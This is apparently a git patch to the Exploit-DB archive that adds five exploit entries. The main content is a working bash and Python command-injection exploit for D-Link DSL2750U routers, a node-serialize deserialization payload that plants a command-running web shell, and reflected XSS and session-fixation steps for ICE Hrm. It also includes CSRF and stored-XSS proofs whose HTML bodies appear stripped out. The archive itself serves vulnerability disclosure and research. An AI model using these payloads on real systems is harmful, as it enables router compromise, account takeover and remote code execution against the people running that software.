From eb316547aa45e45757ac5f78794b19c4882b619b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 19 Jun 2021 05:01:57 +0000 Subject: [PATCH] DB: 2021-06-19 5 changes to exploits/shellcodes Dlink DSL2750U - 'Reboot' Command Injection ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF) ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS) Node.JS - 'node-serialize' Remote Code Execution (3) --- exploits/hardware/remote/50034.txt | 109 +++++++++++++++++++++++++++++ exploits/nodejs/webapps/50036.js | 23 ++++++ exploits/php/webapps/50030.txt | 20 ++++++ exploits/php/webapps/50031.txt | 35 +++++++++ exploits/php/webapps/50032.xml | 28 ++++++++ files_exploits.csv | 5 ++ 6 files changed, 220 insertions(+) create mode 100644 exploits/hardware/remote/50034.txt create mode 100644 exploits/nodejs/webapps/50036.js create mode 100644 exploits/php/webapps/50030.txt create mode 100644 exploits/php/webapps/50031.txt create mode 100644 exploits/php/webapps/50032.xml diff --git a/exploits/hardware/remote/50034.txt b/exploits/hardware/remote/50034.txt new file mode 100644 index 000000000..6d23e1bb7 --- /dev/null +++ b/exploits/hardware/remote/50034.txt @@ -0,0 +1,109 @@ +# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection +# Date: 17-06-2021 +# Exploit Author: Mohammed Hadi (HadiMed) +# Vendor Homepage: https://me.dlink.com/consumer +# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16 +# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R* +# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) + +### + +#!/bin/bash + +# Exploit by HadiMed + +# Takes advantage of the tftp server that accepts the cfg file blindly +echo -ne "\n" +echo "Exploiting Dlink DSL-2750u version 1.6" +echo -ne "\n\n" + +# Sending the payload +echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1 +echo -ne "\n" + +echo "File uploaded Successfully" +echo "Waiting for router to restart" + +sleep 180 # approximate time for router to restart + +python3 exploit.py + +### + +import requests + +# HTTP request looks like this +''' +POST /cgi-bin/webproc HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 175 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://192.168.1.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.1/cgi-bin/webproc +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91 +Connection: close + +getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 +''' + +# 1 Getting a session id + +# password and username crafted by me on the cfg.xml file + +username = "pwned" +password= "pwned" + + +# acually the client set the sessionid in condition that the password and username are correct + +Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef" +Contentty="application/x-www-form-urlencoded" +Referer="http://192.168.1.1/cgi-bin/webproc" +Contentlen="175" + +# Sending first request to set our session id +response = requests.post("http://192.168.1.1/cgi-bin/webproc", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } +, + data={ "getpage":"html/index.html", + "errorpage":"html/main.html", + "var:menu" : "setup", + "var:page":"wizard", + "obj-action":"auth", + ":username":username, + ":password":password, + ":action":"login", + ":sessionid":"deadbeef" +} + ) + + +Referer = "http://192.168.1.1/cgi-bin/webupg" + +name = "mac" +cmd = "1;sleep${IFS}10;reboot;" + +Contentlen = str(len(name+cmd)+10) + +if response.status_code==302: + print("got sessionid=deadbeef !\n waiting for the reverse shell ...") + +# access cgi-bin/webupg +try : + response = requests.post("http://192.168.1.1/cgi-bin/webupg", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } + ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001 + +) + +except requests.exceptions.Timeout : + + print("done router will restart in 20 sec") + +print("Device restarted!") \ No newline at end of file diff --git a/exploits/nodejs/webapps/50036.js b/exploits/nodejs/webapps/50036.js new file mode 100644 index 000000000..ab119c4ba --- /dev/null +++ b/exploits/nodejs/webapps/50036.js @@ -0,0 +1,23 @@ +# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3) +# Date: 17.06.2021 +# Exploit Author: Beren Kuday GORUN +# Vendor Homepage: https://github.com/luin/serialize +# Software Link: https://github.com/luin/serialize +# Version: 0.0.4 +# Tested on: Windows & Ubuntu +# CVE : 2017-5941 + +var serialize = require('node-serialize'); +var payload = { + "webShell" : "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()" + } +serialize.unserialize(serialize.serialize(payload)) + +/* +# after being exploited + +┌──(root@kali)-[/home/kali] +└─# curl http://10.0.2.4:443?cmd=whoami +nodeadmin + +*/ \ No newline at end of file diff --git a/exploits/php/webapps/50030.txt b/exploits/php/webapps/50030.txt new file mode 100644 index 000000000..1e75e49da --- /dev/null +++ b/exploits/php/webapps/50030.txt @@ -0,0 +1,20 @@ +# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation +# Exploit Author: *Piyush Patil *& Rafal Lykowski +# Vendor Homepage: https://icehrm.com/ +# Version: 29.0.0.OS +# Tested on: Windows 10 and Kali + +#Description +ICE Hrm Version 29.0.0.OS is vulnerable to session fixation and reflected cross site scripting leading to full account takeover. + +#Steps to reproduce the attack: +1-Open 2 different browsers (or one with 2 windows - one of them opened in incognito mode) +2-Log in to the system, +3-Paste this payload into the address bar and load it: +http://localhost:8070/app/?g=admin&n=dashboard&m=21484%27%3bdocument.cookie=%22PHPSESSID=12345;path=/;%22%2f%2f +It simulates victim executing XSS. +4-In the incognito window do not log in but just modify session cookie value to 12345. +5-Navigate to any application url - you will realize that you are authorized. It means that your account was taken over. + +#Video POC: +https://drive.google.com/file/d/1egynTGh0XsETgfu7SJtIPv1GZCs1dJ67/view?usp=sharing \ No newline at end of file diff --git a/exploits/php/webapps/50031.txt b/exploits/php/webapps/50031.txt new file mode 100644 index 000000000..1197d424c --- /dev/null +++ b/exploits/php/webapps/50031.txt @@ -0,0 +1,35 @@ +# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF) +# Exploit Author: *Piyush Patil* & Rafal Lykowski +# Vendor Homepage: https://icehrm.com/ +# Version: 29.0.0.OS +# Tested on: Windows 10 and Kali + +#Description +ICE Hrm Version 29.0.0.OS is vulnerable to CSRF which allows attacker to add new admin account or change the password leading to full account takeover. + +#Steps to reproduce the attack: +1- Login as victim +2- Open the CSRF malicious file which I have attached (csrf_POC.html) + + + + +
+ + + + + + +
+ + + +3- Password is changed (you can also add new admin user) + +Now you can simply takeover the account + +#Video POC: +https://drive.google.com/file/d/1uUciTcFEkQ5P_R37QBswNrVbOPqzngpX/view?usp=sharing \ No newline at end of file diff --git a/exploits/php/webapps/50032.xml b/exploits/php/webapps/50032.xml new file mode 100644 index 000000000..c29e0d8b6 --- /dev/null +++ b/exploits/php/webapps/50032.xml @@ -0,0 +1,28 @@ +# Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS) +# Exploit Author: *Piyush Patil *& Rafal Lykowski +# Vendor Homepage: https://icehrm.com/ +# Version: 29.0.0.OS +# Tested on: Windows 10 and Kali + +#Description +The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. + +#Steps to Reproduce the issue: +1- Login to ICE Hrm Admin Panel +2- Click on Employees=>Document Management=> Upload a below xml file + + + + + + + + +3- Visit the upload location of file and XSS will get triggered. + +#Video POC: +https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 14dbf1531..872015c5d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18509,6 +18509,7 @@ id,file,description,date,author,type,platform,port 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris, 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux, 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware, +50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42589,6 +42590,7 @@ id,file,description,date,author,type,platform,port 46852,exploits/php/webapps/46852.txt,"DeepSound 1.0.4 - SQL Injection",2019-05-16,"Mehmet EMIROGLU",webapps,php,80 46864,exploits/php/webapps/46864.txt,"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution",2019-05-17,"numan türle",webapps,php, 46869,exploits/php/webapps/46869.py,"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution",2019-05-20,liquidsky,webapps,php, +50030,exploits/php/webapps/50030.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation",2021-06-18,"Piyush Patil",webapps,php, 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php, 46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware, 46885,exploits/java/webapps/46885.txt,"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection",2019-05-21,omurugur,webapps,java, @@ -44180,3 +44182,6 @@ id,file,description,date,author,type,platform,port 50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php, 50027,exploits/java/webapps/50027.py,"Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration",2021-06-17,"Ricardo Ruiz",webapps,java, 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php, +50031,exploits/php/webapps/50031.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)",2021-06-18,"Piyush Patil",webapps,php, +50032,exploits/php/webapps/50032.xml,"ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)",2021-06-18,"Piyush Patil",webapps,php, +50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,